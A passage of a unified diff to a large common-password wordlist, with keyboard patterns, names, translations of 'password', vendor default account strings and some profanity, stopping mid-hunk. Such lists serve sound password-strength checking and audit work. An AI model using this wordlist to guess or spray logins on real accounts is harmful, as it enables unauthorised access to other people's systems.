+123qweasd +123qweasdzxc +12413 1245 124578 1269 @@ -201,8 +246,10 @@ 1313 131313 13131313 +1314520 1316 1332 +1342 134679 1357 13579 @@ -216,6 +263,7 @@ 142857 1430 143143 +1464688081 147147 147258 14725836 @@ -224,12 +272,14 @@ 147852369 1478963 14789632 +147896325 1492 1515 151515 159159 159357 159753 +159753qq 159951 1616 161616 @@ -317,17 +367,23 @@ 1a2b3c 1a2b3c4d 1chris +1g2w3e4r 1kitty 1p2o3i 1passwor +1password 1q2w3e 1q2w3e4r 1q2w3e4r5t +1q2w3e4r5t6y +1qa2ws3ed 1qaz 1qaz2wsx +1qaz2wsx3edc 1qazxsw2 1qw23e 1qwerty +1v7Upjw3nT 1x2zkg8w 2000 200000 @@ -385,7 +441,9 @@ 272727 2828 282828 +290966 292929 +29rsavoy 2fast4u 2kids 3000gt @@ -430,6 +488,7 @@ 393939 3bears 3ip76k2 +3rJs1la7qE 4040 404040 4055 @@ -440,6 +499,7 @@ 420000 420247 420420 +421uiopy258 4242 424242 426hemi @@ -460,6 +520,7 @@ 456654 4567 456789 +456852 464646 4711 474747 @@ -483,6 +544,8 @@ 515000 51505150 515151 +5201314 +520520 5252 525252 5329 @@ -498,6 +561,7 @@ 555555 5555555 55555555 +5555555555 555666 5656 565656 @@ -518,6 +582,7 @@ 654321 655321 656565 +666 6666 66666 666666 @@ -544,6 +609,7 @@ 7654321 767676 7734 +7758521 777 7777 77777 @@ -586,6 +652,7 @@ 9379992 951753 963852 +963852741 969696 987456 9876 @@ -593,6 +660,7 @@ 987654 98765432 987654321 +9876543210 987987 989898 9999 @@ -601,200 +669,26 @@ 9999999 99999999 999999999 -????? -?????? -@#$%^& -ABC123 -Abcdef -Abcdefg -Admin -Alexis -Alpha -Andrew -Animals -Anthony -Ariel -Asdfgh -BOSS -Bailey -Bastard -Beavis -Bismillah -Bond007 -Bonzo -Booboo -Boston -Broadway -Canucks -Cardinal -Carol -Casio -Celtics -Champs -ChangeMe -Changeme -Charlie -Chris -Computer -Cougar -Creative -Curtis -Daniel -Darkman -Denise -Dragon -Eagles -Elizabeth -Esther -Family -Figaro -Fisher -Fishing -Fortune -Freddy -Friday -Friends -Front242 -FuckYou -Fuckyou -Gandalf -Geronimo -Gingers -Gizmo -Golden -Goober -Gretel -HARLEY -Hacker -Hammer -Harley -Heather -Hello -Hendrix -Henry -Hershey -Homer -Internet -JSBach -Jackson -Janet -Jeanne -Jennifer -Jersey -Jessica -Joanna -Johnson -Jordan -Joshua -KILLER -Katie -Killer -Kitten -Knight -Liberty -Lindsay -Lizard -Login -Madeline -Margaret -Master -Matthew -Maxwell -Mellon -Merlot -Metallic -Michael -Michel -Michel1 -Michelle -Monday -Money -Monster -Montreal -NCC1701 -Newton -Nicholas -Noriko -OU812 -October -PASSWORD -PPP -Paladin -Pamela -Passw0rd -Password -Password1 -Peaches -Peanuts -Pentium -Pepper -Peter -Phoenix -Piglet -Pookie -Princess -Purple -Qwert -Qwerty -Rabbit -Raiders -Raistlin -Random -Rebecca -Robert -Russell -Sammy -Saturn -Service -Shadow -Sidekick -Sierra -Skeeter -Smokey -Snoopy -Sparky -Speedy -Sterling -Steven -Summer -Sunshine -Superman -Sverige -Swoosh -Taurus -Taylor -Tennis -Theresa -Thomas -Thunder -Tigger -Tuesday -Usuckballz1 -Vernon -Victoria -Vincent -Waterloo -Webster -Willow -Windows -Winnie -Wolverine -Woodrow -World -Zxcvb -Zxcvbnm a a12345 a123456 a1234567 +a12345678 +a123456789 a1b2c3 a1b2c3d4 +a1s2d3f4 +a838hfiD aa +aa123456 +aa12345678 aaa aaa111 aaaa aaaaa +aaaaa1 aaaaaa +aaaaaa1 aaaaaaa aaaaaaaa aaliyah @@ -806,15 +700,22 @@ abbott abby abc abc123 +ABC123 abc1234 abc12345 +abc123456 abcabc abcd abcd123 abcd1234 +Abcd1234 abcde abcdef +Abcdef abcdefg +Abcdefg +abcdefg1 +abcdefg123 abcdefgh aberdeen abgrtyu @@ -853,6 +754,7 @@ adi adidas adldemo admin +Admin admin1 admin12 admin123 @@ -884,6 +786,7 @@ ahl ahm aikido aikman +aikotoba aileen airborne airbus @@ -920,10 +823,14 @@ alex1 alexalex alexande alexander +alexander1 alexandr alexandra +alexandre alexia alexis +Alexis +alexis1 alf alfa alfaro @@ -964,6 +871,7 @@ almond aloha alone alpha +Alpha alpha1 alphabet alpine @@ -994,6 +902,7 @@ america america1 american amethyst +amho amigo amigos amorphous @@ -1020,9 +929,11 @@ andre1 andrea andrea1 andreas +andrei andres andrew andrew! +Andrew andrew1 andrey andromache @@ -1033,6 +944,7 @@ andyod22 anfield angel angel1 +angel123 angela angelica angelika @@ -1046,8 +958,10 @@ angie angie1 angus angus1 +anhyeuem animal animals +Animals anime anita ann @@ -1066,6 +980,7 @@ answer antares antelope anthony +Anthony anthony1 anthrax anthropogenic @@ -1077,6 +992,7 @@ antony anubis anvils anything +aobo2010 aolsucks ap apache @@ -1119,6 +1035,7 @@ ariana ariane arianna ariel +Ariel aries arizona arkansas @@ -1142,21 +1059,31 @@ arturo asasas asd asd123 +asd123456 asdasd +asdasd123 +asdasd5 +asdasdasd asddsa asdf asdf12 asdf123 asdf1234 -asdf;lkj +asdf12345 asdfasdf asdfg +asdfg1 asdfgh +Asdfgh +asdfgh1 asdfghj asdfghjk asdfghjkl +asdfghjkl1 asdfjkl asdfjkl; +asdf;lkj +asdqwe123 asdsa asdzxc asf @@ -1252,18 +1179,23 @@ az1943 azazel azerty azertyui +azertyuiop azsxdc aztecs azure azzer +b123456 baba babe babes babies baby +baby12 +baby123 babybaby babyblue babyboy +babyboy1 babycake babydoll babyface @@ -1288,11 +1220,14 @@ badger badgers badgirl badman +badoo baggins baggio bahamut bailey +Bailey bailey1 +baili123com baker balance baldwin @@ -1362,6 +1297,7 @@ basset bassman bassoon bastard +Bastard bastards batch bathing @@ -1398,6 +1334,7 @@ bearcat bearcats beardog bears +bearshare beast beastie beasty @@ -1408,9 +1345,11 @@ beatrice beatriz beautifu beautiful +beautiful1 beauty beaver beavis +Beavis beavis1 bebe because @@ -1475,6 +1414,7 @@ beryl bessie best bestbuy +bestfriend beta betacam beth @@ -1486,6 +1426,7 @@ better betty beverly bharat +bhf bian bianca biao @@ -1555,6 +1496,7 @@ billybob billyboy bim bimbo +bimilbeonho bimmer bing bingo @@ -1576,6 +1518,7 @@ bis biscuit bishop bismillah +Bismillah bisounours bitch bitch1 @@ -1619,9 +1562,11 @@ blaze blazer bledsoe blessed +blessed1 blessing blewis blinds +Blink123 blink182 bliss blitz @@ -1701,6 +1646,7 @@ bonanza bonbon bond bond007 +Bond007 bondage bone bonehead @@ -1714,11 +1660,14 @@ bonkers bonner bonnie bonsai +Bonzo boob boobear boobie boobies booboo +Booboo +booboo1 boobs booger boogie @@ -1747,9 +1696,11 @@ boris borussia bosco boss +BOSS boss123 bossman boston +Boston bottle bottom boulder @@ -1822,8 +1773,10 @@ britain british britney brittany +brittany1 brittney broadway +Broadway brodie broken broker @@ -1891,8 +1844,8 @@ buffet buffett buffy buffy1 -bug_reports bugger +bug_reports bugs bugsy builder @@ -1943,6 +1896,7 @@ buttercu buttercup butterfl butterfly +butterfly1 butters buttfuck butthead @@ -1958,6 +1912,7 @@ byebye byron byteme c00per +c123456 caballo cabbage cabernet @@ -1969,7 +1924,6 @@ cactus cad cadillac caesar -cafc91 caitlin calendar calgary @@ -1991,6 +1945,7 @@ camaro camaross camay camber +cambiami camden camel camelot @@ -2031,6 +1986,7 @@ cantona cantor canuck canucks +Canucks canyon capecod capetown @@ -2048,6 +2004,7 @@ carbon card cardiff cardinal +Cardinal cardinals cards carebear @@ -2059,6 +2016,7 @@ carlito carlitos carlo carlos +carlos1 carlton carman carmel @@ -2068,6 +2026,7 @@ carmex2 carnage carnival carol +Carol carol1 carole carolina @@ -2097,6 +2056,7 @@ cash cashmone casino casio +Casio casper casper1 cassandr @@ -2130,8 +2090,6 @@ cavalier caveman cayman cayuga -cbr600 -cbr900rr ccbill cccc ccccc @@ -2139,8 +2097,6 @@ cccccc ccccccc cccccccc cct -cdemo82 -cdemo83 cdemocor cdemorid cdemoucb @@ -2160,6 +2116,7 @@ celica celine celtic celtics +Celtics cement ceng center @@ -2183,6 +2140,7 @@ chameleon champ champion champs +Champs chan chance chandler @@ -2190,9 +2148,11 @@ chandra chanel chang change -change_on_install changeit changeme +Changeme +ChangeMe +change_on_install changes channel chantal @@ -2209,6 +2169,7 @@ charles charles1 charley charlie +Charlie charlie1 charlie2 charlott @@ -2293,6 +2254,7 @@ chippy chips chiquita chivas +chivas1 chloe chloe1 chocha @@ -2307,8 +2269,10 @@ choochoo chopin chopper chou +chouchou chouette chris +Chris chris1 chris123 chris6 @@ -2321,6 +2285,7 @@ christa christi christia christian +christian1 christie christin christina @@ -2372,6 +2337,7 @@ citroen city civic civil +cjmasterinf claire clancy clapton @@ -2432,6 +2398,7 @@ cluster clusters clutch clyde +cme2012 cn coach cobain @@ -2453,6 +2420,7 @@ code codename codered codeword +codewort cody coffee cohiba @@ -2485,6 +2453,7 @@ comanche combat comedy comein +comeon11 comet comfort comics @@ -2504,6 +2473,7 @@ compiere complete compton computer +Computer computer1 comrade comrades @@ -2531,6 +2501,9 @@ contact content contest contract +contrasena +contrasenya +contrasinal control controller conway @@ -2580,6 +2553,7 @@ cottage cotton coucou cougar +Cougar cougars counter country @@ -2613,6 +2587,7 @@ creamy create creation creative +Creative creature credit creosote @@ -2627,6 +2602,7 @@ cristina critter cromwell cross +crossfire crow crowley crp @@ -2679,10 +2655,12 @@ cupoi curious current curtis +Curtis cus custom customer cutie +cutie1 cutiepie cutlass cutter @@ -2697,8 +2675,8 @@ cypress cyprus cyrano cz -d_syspw -d_systpw +d123456 +D1lakiss dabears dabomb dada @@ -2742,10 +2720,12 @@ dandan dang danger daniel +Daniel daniel1 daniela daniele danielle +danielle1 daniels danni danny @@ -2762,6 +2742,7 @@ dark1 darkange darklord darkman +Darkman darkness darkside darkstar @@ -2854,12 +2835,16 @@ demo demo8 demo9 demon +demon1q2w3e +demon1q2w3e4r +demon1q2w3e4r5t demons denali deng deniro denis denise +Denise denmark dennis denny @@ -2889,7 +2874,6 @@ destiny1 destroy detroit deutsch -dev2000_demos develop device devil @@ -2948,6 +2932,7 @@ dingo dinner dino dinosaur +DIOSESFIEL dip dipper dipshit @@ -3066,11 +3051,13 @@ down downer download downtown +dpbk1234 dpfpass draco dracula draft dragon +Dragon dragon1 dragon12 dragon69 @@ -3105,6 +3092,8 @@ drummer1 drums dsgateway dssys +d_syspw +d_systpw dtsp duan duane @@ -3145,12 +3134,12 @@ dynamite dynamo dynasty e -e-mail eaa eager eagle eagle1 eagles +Eagles eagles1 eam earl @@ -3228,6 +3217,7 @@ elissa elite elizabet elizabeth +Elizabeth elizabeth1 ella ellen @@ -3241,6 +3231,7 @@ elvis1 elvisp elway7 elwood +e-mail email emerald emerson @@ -3250,6 +3241,7 @@ emilio emily emily1 eminem +eminem1 emma emmanuel emmett @@ -3306,6 +3298,7 @@ escape escort escort1 eskimo +esmeramz espresso esquire establish @@ -3313,6 +3306,7 @@ estate estefania estelle esther +Esther estore estrella eternal @@ -3342,6 +3336,8 @@ exchadm exchange excite exfsys +exigent +Exigent exodus exotic experienced @@ -3356,11 +3352,12 @@ extension extra extreme eyal -f**k f00tball fa fabian +facalfare face +facebook facial factory faculty @@ -3378,6 +3375,7 @@ fallen fallon fallout family +Family family1 famous fandango @@ -3456,6 +3454,7 @@ field fields fiesta figaro +Figaro fight fighter fii @@ -3491,6 +3490,7 @@ fish fish1 fishbone fisher +Fisher fishers fishes fishfish @@ -3498,6 +3498,7 @@ fishhead fishie fishin fishing +Fishing fishing1 fishman fishon @@ -3505,6 +3506,8 @@ fisting fitness fitter five +fjalekalim +f**k fktrcfylh flakes flame @@ -3534,6 +3537,7 @@ florida florida1 flounder flower +flower1 flower2 flowerpot flowers @@ -3550,6 +3554,7 @@ flyfish flying fnd fndpub +focalfaire focus foobar food @@ -3583,6 +3588,7 @@ forsythe fortress fortuna fortune +Fortune forum forward fossil @@ -3623,6 +3629,7 @@ freckles fred freddie freddy +Freddy frederic fredfred fredrick @@ -3644,10 +3651,13 @@ french french1 fresh friday +Friday friend friendly friends +Friends friends1 +friendster fright frighten frisco @@ -3665,6 +3675,7 @@ froggy frogman frogs front242 +Front242 frontier frost frosty @@ -3675,9 +3686,9 @@ fubar fuck fuck123 fuck69 -fuck_inside fucked fucker +fucker1 fuckers fuckface fuckfuck @@ -3685,9 +3696,11 @@ fuckhead fuckher fuckin fucking +fuck_inside fuckinside fuckit fuckme +fuckme1 fuckme2 fuckoff fuckoff1 @@ -3696,6 +3709,8 @@ fucku fucku2 fuckyou fuckyou! +Fuckyou +FuckYou fuckyou1 fuckyou2 fugazi @@ -3718,6 +3733,7 @@ future fuzz fuzzy fv +fyfcnfcbz fylhtq gabber gabby @@ -3730,6 +3746,7 @@ gadget gaelic gagged gagging +gagtnabar galant galaxy galileo @@ -3746,11 +3763,13 @@ games gamma gammaphi gandalf +Gandalf gandalf1 ganesh gang gangbang gangsta +gangsta1 gangster garage garbage @@ -3803,7 +3822,9 @@ german germany germany1 geronimo +Geronimo gertrude +geslo gesperrt getmoney getout @@ -3839,6 +3860,7 @@ gilligan gina ginger ginger1 +Gingers giorgio giovanni giraffe @@ -3847,6 +3869,7 @@ girls giselle giuseppe gizmo +Gizmo gizmo1 gizmodo gl @@ -3904,6 +3927,7 @@ goku gold goldberg golden +Golden golden1 goldfing goldfish @@ -3912,6 +3936,7 @@ goldstar goldwing golf golfball +golfcourse golfer golfer1 golfgolf @@ -3926,18 +3951,20 @@ gonzalez gonzo gonzo1 goober +Goober good -good-luck goodboy goodbye goodday goodgirl goodie +good-luck goodluck goodman goodtime goofy google +google1 googoo gooner goose @@ -3961,6 +3988,7 @@ gotohell gotribe gouge govols +gozarvazhe gpfd gpld gr @@ -4013,6 +4041,7 @@ gremlin grendel greta gretchen +Gretel gretzky griffey griffin @@ -4025,6 +4054,7 @@ groove groovy groucho group +Groupd2013 groups grover grumpy @@ -4047,6 +4077,7 @@ guitars gumby gumption gundam +gunho gunnar gunner gunners @@ -4055,15 +4086,19 @@ guntis gustav gustavo guyver +gwerty +gwerty123 gymnast gypsy h2opolo hack hacker +Hacker hades haggis haha hahaha +hahaha1 hahahaha hailey hair @@ -4077,6 +4112,7 @@ halifax hall hallie hallo +hallo123 halloween hallowell hambone @@ -4086,6 +4122,7 @@ hamilton hamish hamlet hammer +Hammer hammers hammond hampton @@ -4126,6 +4163,8 @@ hardrock hardware harlem harley +Harley +HARLEY harley1 harman harmony @@ -4138,9 +4177,11 @@ harris harrison harry harry1 +harrypotter harvard harvest harvey +haslo hassan hastings hate @@ -4169,6 +4210,7 @@ hearts heat heater heather +Heather heather1 heather2 heaven @@ -4189,11 +4231,13 @@ helene hell hellfire hello +Hello hello1 hello123 hello2 hello8 hellohello +hellokitty helloo hellos hellyeah @@ -4204,8 +4248,10 @@ help123 helper helpme hendrix +Hendrix heng henry +Henry henry1 hentai herbert @@ -4220,13 +4266,17 @@ hermosa heroes herring hershey +Hershey herzog +heslo +hesoyam hetfield hewitt hewlett heyhey heynow heythere +hg0209 hhhh hhhhh hhhhhh @@ -4290,6 +4340,7 @@ homeboy homebrew homemade homer +Homer homer1 homerj homers @@ -4353,6 +4404,7 @@ hotstuff hott hottest hottie +hottie1 hotties houdini hounddog @@ -4370,6 +4422,7 @@ huai huang hubert hudson +hudyat huey huge hugh @@ -4430,6 +4483,7 @@ if6was9 iforget iforgot ifssys +igamalokungena igc igf igi @@ -4450,13 +4504,17 @@ illinois illusion ilmari ilovegod +iloveme +iloveme1 ilovesex iloveu iloveu1 +iloveu2 iloveyou iloveyou! iloveyou. iloveyou1 +iloveyou12 iloveyou2 iloveyou3 image @@ -4476,11 +4534,13 @@ imt include incubus india +india123 indian indiana indians indigo indonesia +Indya123 infantry inferno infiniti @@ -4512,15 +4572,18 @@ intercourse intern internal internet +Internet intranet intrepid intruder +inuyasha inv invalid invalid password iomega ipa ipd +iphasiwedi iplanet ipswich ireland @@ -4553,10 +4616,10 @@ itg itsme ivan iverson -iverson3 iwantu izzy j0ker +j123456 j1l2t3 ja jabber @@ -4571,6 +4634,7 @@ jackjack jackoff jackpot jackson +Jackson jackson1 jackson5 jacob @@ -4587,6 +4651,7 @@ jakarta jake jakejake jakey +jakjak jamaica james james007 @@ -4605,6 +4670,7 @@ jan jane janelle janet +Janet janice janie janine @@ -4623,6 +4689,7 @@ jasper java javelin javier +javka jaybird jayden jayhawk @@ -4636,6 +4703,7 @@ je jean jeanette jeanne +Jeanne jeannie jedi jeep @@ -4649,6 +4717,7 @@ jeffrey1 jello jelly jellybea +jelszo jen jenifer jenjen @@ -4659,6 +4728,8 @@ jennaj jenni jennie jennifer +Jennifer +jennifer1 jenny jenny1 jensen @@ -4675,10 +4746,12 @@ jerome jerry jerry1 jersey +Jersey jess jesse jesse1 jessica +Jessica jessica1 jessie jester @@ -4728,6 +4801,7 @@ jl jmuser joanie joanna +Joanna joanne jocelyn jockey @@ -4757,6 +4831,7 @@ johnjohn johnny johnny5 johnson +Johnson johnson1 jojo jojojo @@ -4766,12 +4841,14 @@ jokers jomama jonas jonathan +jonathan1 jonathon jones jones1 jonjon jonny jordan +Jordan jordan1 jordan23 jordie @@ -4784,6 +4861,7 @@ joseph1 josephin josh joshua +Joshua joshua1 josie journey @@ -4791,6 +4869,7 @@ joy joyce joyjoy jsbach +JSBach jtf jtm jts @@ -4839,11 +4918,16 @@ justice justice4 justin justin1 +justinbieb +justinbieber justine justme justus juventus +k. +k.: kaboom +kadavucol kahlua kahuna kaiser @@ -4851,7 +4935,11 @@ kaitlyn kakaxaqwe kakka kalamazo +kalameobur kali +kalimatumurur +kalimatusirr +kalmarsirri kamikaze kane kang @@ -4869,8 +4957,10 @@ karma kashmir kasper kat +katalaluan katana katarina +katasandi kate katerina katherin @@ -4880,6 +4970,7 @@ kathrine kathryn kathy katie +Katie katie1 katina katrin @@ -4912,6 +5003,7 @@ keng kenken kennedy kenneth +kennwort kenny kenobi kenshin @@ -4950,7 +5042,10 @@ kill killa killbill killer +Killer +KILLER killer1 +killer123 killers killjoy killkill @@ -4988,6 +5083,7 @@ kitchen kiteboy kitkat kitten +Kitten kittens kittie kitty @@ -5008,12 +5104,16 @@ klondike knickers knicks knight +Knight knights knock knockers knuckles koala +kobe24 +kodeord kodiak +kodikos kojak koko kokoko @@ -5025,6 +5125,7 @@ kool koolaid korn kotaku +kouling kramer kris krishna @@ -5046,6 +5147,11 @@ kuai kuang kume kungfu +kupiasoz +kupuhipa +kupukaranga +kupuuru +kupuwhakahipa kurt kwalker kyle @@ -5065,6 +5171,7 @@ lagnaf laguna lakers lakers1 +lakers24 lakeside lakewood lakota @@ -5099,6 +5206,7 @@ laserjet laskjdf098ksdaf09 lassie lassie1 +lastfm lasvegas latin latina @@ -5108,6 +5216,7 @@ laura laura1 laurel lauren +lauren1 laurence laurent laurie @@ -5125,6 +5234,7 @@ leanne leather lebesgue leblanc +lebron23 ledzep lee leeds @@ -5179,6 +5289,7 @@ liang liao libertad liberty +Liberty libra library lick @@ -5204,16 +5315,20 @@ lilly lima limewire limited +lincogo1 lincoln linda linda1 linden lindros lindsay +Lindsay lindsey ling link +linkedin linkin +linkinpark links lion lionel @@ -5237,6 +5352,8 @@ liverpool1 living liz lizard +Lizard +lizottes lizzie lizzy lkjhgf @@ -5260,11 +5377,13 @@ logan1 logger logical login +Login logitech logos lois loislane loki +lol lol123 lola lolipop @@ -5305,6 +5424,8 @@ lorin lorna lorraine lorrie +losen +losenord loser loser1 losers @@ -5319,20 +5440,27 @@ louise loulou love love1 +love11 love12 love123 +love1234 +love13 +love4ever love69 lovebug loveit lovelife lovelove lovely +lovely1 loveme loveme1 +loveme2 lover lover1 loverboy lovers +lovers1 lovesex loveya loveyou @@ -5340,6 +5468,7 @@ loveyou1 loving lowell lowrider +lozinka luan lucas lucas1 @@ -5365,9 +5494,11 @@ luna lunchbox lust luther +lykilord lynn lynne m +m123456 m1911a1 mac macaroni @@ -5391,6 +5522,7 @@ madden maddie maddog madeline +Madeline madison madison1 madmad @@ -5401,6 +5533,7 @@ madoka madonna madrid maestro +maganda magazine magelan magellan @@ -5421,6 +5554,8 @@ magnum magnus magpie magpies +mahalkita +mahalko mahler maiden mail @@ -5446,6 +5581,7 @@ mallrats malone mama mamacita +mamapapa mamas mammoth manag3r @@ -5481,6 +5617,7 @@ manuel manuela manutd maple +mar mara maradona marathon @@ -5497,6 +5634,7 @@ marcos marcus marcy margaret +Margaret margarita margie maria @@ -5545,6 +5683,7 @@ marquis marriage married mars +marseille marsha marshal marshall @@ -5572,6 +5711,7 @@ massage massimo massive master +Master master1 master12 masterbate @@ -5583,11 +5723,13 @@ matchbox math mathew matilda +matkhau matrix matrix1 matt matteo matthew +Matthew matthew1 matthews matthias @@ -5612,6 +5754,7 @@ maximus maxine maxmax maxwell +Maxwell maxwell1 maxx maxxxx @@ -5651,6 +5794,7 @@ megaman megan megan1 megane +megaparol12345 megapass megatron meggie @@ -5662,6 +5806,7 @@ melinda melissa melissa1 mellon +Mellon mellow melody melrose @@ -5689,6 +5834,7 @@ meridian merlin merlin1 merlot +Merlot mermaid merrill messenger @@ -5696,11 +5842,14 @@ messiah met2002 metal metallic +Metallic metallica +metallica1 method mets mexican mexico +mexico1 mfg mgr mgwuser @@ -5709,6 +5858,7 @@ miamor mian miao michael +Michael michael1 michael2 michaela @@ -5716,8 +5866,12 @@ michaels michal micheal michel +Michel +Michel1 michele michelle +Michelle +michelle1 michigan michou mick @@ -5731,6 +5885,7 @@ microsoft middle midget midnight +midnight1 midnite midori midvale @@ -5762,6 +5917,7 @@ millions millwall milo milton +mima mimi mindy mine @@ -5836,6 +5992,7 @@ mollydog molson mom mommy +mommy1 momo momomo momoney @@ -5843,10 +6000,12 @@ monaco monalisa monarch monday +Monday mondeo mone monet money +Money money1 money123 money159 @@ -5868,6 +6027,7 @@ monkeys monopoly monroe monster +Monster monster1 monsters montag @@ -5876,6 +6036,7 @@ montana3 monte montecar montreal +Montreal montrose monty monty1 @@ -5918,7 +6079,10 @@ mortimer morton moscow moses +mot de passe mot_de_passe +motdepasse +mot dordre mother mother1 motherfucker @@ -5984,15 +6148,21 @@ mygirl mykids mylife mylove +mynoob mypass mypassword mypc123 myriam myrtle myself +myspace myspace1 +myspace123 +myspace2 mystery mystic +n +N0=Acc3ss nadia nadine nagel @@ -6012,11 +6182,13 @@ napoli napster narnia naruto +naruto1 nasa nascar nascar24 nasty nasty1 +nastya nat natalia nataliag @@ -6040,6 +6212,7 @@ navy navyseal nazgul ncc1701 +NCC1701 ncc1701a ncc1701d ncc1701e @@ -6056,6 +6229,7 @@ nellie nelson nemesis neng +nenosiri neon neotix_sys nepenthe @@ -6088,6 +6262,7 @@ newpass6 newport news newton +Newton newuser newyork newyork1 @@ -6103,6 +6278,8 @@ nice niceass niceguy nicholas +Nicholas +nicholas1 nichole nick nickel @@ -6168,6 +6345,7 @@ none none1 nonenone nong +nonmember nonono noodle noodles @@ -6176,6 +6354,7 @@ nopass nopassword norbert noreen +Noriko normal norman normandy @@ -6207,6 +6386,7 @@ nudist nuevopc nugget nuggets +NULL number number1 number9 @@ -6224,10 +6404,11 @@ nylons nymets nympho nyquist +nywila oakland oakley -oas_public oasis +oas_public oatmeal oaxaca obelix @@ -6243,17 +6424,18 @@ ocelot ocitest ocm_db_admin october +October octopus odessa odm ods -ods_server odscommon +ods_server odyssey oe -oem_temp oemadm oemrep +oem_temp office officer offshore @@ -6271,6 +6453,7 @@ okokok okr oks oksana +okwuntughe okx olapdba olapsvr @@ -6347,6 +6530,8 @@ orioles orion orion1 orlando +oroasina +oroigbaniwole orville orwell oscar @@ -6362,6 +6547,7 @@ ottawa otter otto ou812 +OU812 ou8122 ou8123 outback @@ -6383,6 +6569,7 @@ ozf ozp ozs ozzy +p pa pa55w0rd pa55word @@ -6401,6 +6588,7 @@ paco pad paddle padres +paeseuwodeu page pain painless @@ -6413,6 +6601,8 @@ pajero pakistan palace paladin +Paladin +palavra-passe palermo pallmall palmer @@ -6420,6 +6610,7 @@ palmtree paloma pam pamela +Pamela pana panama panasoni @@ -6458,12 +6649,22 @@ park parker parol parola +parolachiave +paroladordine +parole +paroli +parolja +parool parrot partner party +parulle pasadena +pasahitza pascal +pasfhocal pasion +pasowardo pass pass1 pass12 @@ -6472,19 +6673,26 @@ pass1234 passat passion passme +passord passpass passport passw0rd +Passw0rd passwd passwo1 passwo2 passwo3 passwo4 passwor + password password! password. +Password +PASSWORD password1 +Password1 +password11 password12 password123 password2 @@ -6493,6 +6701,8 @@ password9 passwords passwort pastor +pasuwado +pasvorto pasword pat patch @@ -6527,11 +6737,14 @@ peace peace1 peach peaches +Peaches peaches1 peachy peacock peanut +peanut1 peanuts +Peanuts pearl pearljam pearls @@ -6564,11 +6777,13 @@ penny1 pentagon penthous pentium +Pentium people peoria pepe pepito pepper +Pepper pepper1 peppers pepsi @@ -6594,6 +6809,7 @@ pervert petalo pete peter +Peter peter1 peterbil peterk @@ -6622,6 +6838,7 @@ phish phishy phoebe phoenix +Phoenix phoenix1 phone photo @@ -6653,6 +6870,7 @@ piff pigeon piggy piglet +Piglet pigpen pikachu pillow @@ -6660,6 +6878,7 @@ pilot pimp pimpdadd pimpin +pimpin1 pimping pinball pineappl @@ -6699,6 +6918,7 @@ pizza1 pizzaman pizzas pjm +pk3x7w9W placebo plane planes @@ -6716,6 +6936,7 @@ playball playboy playboy1 player +player1 players playing playmate @@ -6741,6 +6962,7 @@ poa pocket poetic poetry +pogiako point pointer poipoi @@ -6748,6 +6970,8 @@ poison poiuy poiuyt pokemon +pokemon1 +pokemon123 poker poker1 poland @@ -6778,6 +7002,7 @@ poohbear poohbear1 pookey pookie +Pookie pookie1 pool pool6123 @@ -6791,6 +7016,7 @@ pooppoop poopy pooter popcorn +popcorn1 pope popeye popo @@ -6811,16 +7037,6 @@ porsche porsche1 porsche9 porsche911 -portal30 -portal30_admin -portal30_demo -portal30_ps -portal30_public -portal30_sso -portal30_sso_admin -portal30_sso_ps -portal30_sso_public -portal31 portal_demo portal_sso_ps porter @@ -6844,6 +7060,7 @@ power1 powercartuser powers ppp +PPP pppp ppppp pppppp @@ -6865,6 +7082,7 @@ pressure presto preston pretty +pretty1 priest primary primus @@ -6872,6 +7090,7 @@ prince prince1 princesa princess +Princess princess1 princeton pringles @@ -6910,6 +7129,7 @@ psa psalms psb psp +p@ssw0rd psycho pub public @@ -6940,6 +7160,7 @@ puppy puppydog purdue purple +Purple purple1 puss pussey @@ -6959,14 +7180,19 @@ pw123 pyramid pyro python +q12345 +q123456 q1w2e3 q1w2e3r4 q1w2e3r4t5 +q1w2e3r4t5y6 qa qawsed qaz123 qazqaz qazwsx +qazwsx1 +qazwsx123 qazwsxed qazwsxedc qazxsw @@ -6977,12 +7203,14 @@ qing qiong qosqomanta qp +qq123456 qqq111 qqqq qqqqq qqqqqq qqqqqqq qqqqqqqq +qqww1122 qs qs_adm qs_cb @@ -7007,8 +7235,10 @@ quest question quincy qwaszx +qwe qwe123 qweasd +qweasd123 qweasdzxc qweewq qweqwe @@ -7017,13 +7247,20 @@ qwer1234 qwerasdf qwerqwer qwert +Qwert qwert1 qwert123 +qwert12345 qwert40 qwerty +Qwerty qwerty1 qwerty12 qwerty123 +qwerty1234 +qwerty12345 +qwerty123456 +qwerty321 qwerty7 qwerty80 qwertyu @@ -7035,6 +7272,7 @@ qwqwqw r0ger r2d2c3po rabbit +Rabbit rabbit1 rabbits race @@ -7057,8 +7295,10 @@ rafaeltqm rafiki rage ragnarok +rahatphan raider raiders +Raiders raiders1 railroad rain @@ -7070,6 +7310,7 @@ raindrop rainman rainyday raistlin +Raistlin raleigh rallitas ralph @@ -7084,10 +7325,12 @@ rampage ramrod ramses ramsey +ramzobur ranch rancid randall random +Random randy randy1 rang @@ -7129,6 +7372,7 @@ realmadrid reaper reason rebecca +Rebecca rebecca1 rebel rebel1 @@ -7192,12 +7436,13 @@ rene renee renegade reng -rep_owner +rental repadmin repair replicate report reports +rep_owner reptile republic republica @@ -7269,6 +7514,7 @@ rob robbie robby robert +Robert robert1 roberta roberto @@ -7301,6 +7547,7 @@ rocknroll rockon rocks rockstar +rockstar1 rockwell rocky rocky1 @@ -7365,6 +7612,7 @@ roy royal royals royalty +rr123456rr rrrr rrrrr rrrrrr @@ -7385,6 +7633,7 @@ rugger rules rumble runaway +runescape runner running rupert @@ -7393,6 +7642,7 @@ rush2112 ruslan russel russell +Russell russia russian rusty @@ -7402,6 +7652,7 @@ ruth ruthie ruthless ryan +s123456 sabbath sabina sabine @@ -7426,6 +7677,7 @@ sakura sal salami salasana +salasona saleen salem sales @@ -7440,13 +7692,15 @@ salvador salvation sam sam123 -samIam samantha +samantha1 sambo samiam +samIam samm sammie sammy +Sammy sammy1 samoht sample @@ -7459,6 +7713,7 @@ samsung1 samuel samuel22 samurai +sanane sanchez sancho sand @@ -7484,6 +7739,7 @@ santafe santana santiago santos +santoysena sap saphire sapper @@ -7501,11 +7757,13 @@ sasha1 saskia sassy sassy1 +sasuke satan satan666 satori saturday saturn +Saturn saturn5 sauron sausage @@ -7532,6 +7790,7 @@ scheme schmidt schnapps school +school1 science scissors scooby @@ -7626,6 +7885,7 @@ serpent servando server service +Service serviceconsumer1 services sesame @@ -7650,6 +7910,8 @@ sexxxy sexxy sexy sexy1 +sexy12 +sexy123 sexy69 sexybabe sexyboy @@ -7661,6 +7923,7 @@ seymour sf49ers sh shadow +Shadow shadow1 shadow12 shadows @@ -7768,16 